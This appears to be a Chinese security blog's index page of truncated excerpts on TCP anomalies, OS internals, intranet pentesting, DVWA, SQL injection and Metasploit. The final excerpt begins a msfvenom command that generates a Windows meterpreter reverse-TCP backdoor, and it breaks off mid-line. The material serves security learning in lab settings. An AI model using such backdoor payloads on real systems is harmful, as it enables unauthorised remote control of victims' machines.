今天我们继续介绍关于TCP异常情况的内容。本篇文章接着上一篇文章,前面分析了在连接过程中的各种异常,本篇文章重点介绍的是在数据传输过程中的各种异常,以及出现异常后的TCP连接...
前言 对于操作系统的分析,是一个复杂且枯燥的过程,其中包括中断、调用等一系列的问题,需要从原理和代码两层的角度进行分析,包含汇编、C语言等较为难理解的知识,以及算法的思维。 ...
前言 很久没做内网了,温习一下。希望正在学习安全的小伙伴不要踏入我初学内网的误区。 先来谈谈我对内网的理解吧,不是技术的方向。 内网学的东西很多,很杂。当时我问了我的大哥,他...
DVWA实践 Web漏洞原理 1. DVWA环境搭建 Warmpserver+DVWA 2. Brute Force(暴力破解) 暴力破解指的是攻击者利用字典来穷举拆解出用户...
在我们测试用到的时候,经常会使用到一些语法,应该透彻理解透彻这些函数1)order byb 用于根据指定的列对。语句默认按照升序对记录进行排序。语法:select id ,u...
1.渗透测试框架 默认的数据库为:postgresql端口为:5432初始化数据库msfdb reinit 2.技术功能模块(不是流程模块)程序主目录/usr/share/m...
前言 通常sql 注入漏洞会被分为2种类型数值型字符型其实所有产生类型都是数据库本身表产生的,在我们创建的时候会发现其后面总有个数据类型限制,而不同的数据库有不同的数据类型,...
1.kali生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.116.128 lport=12...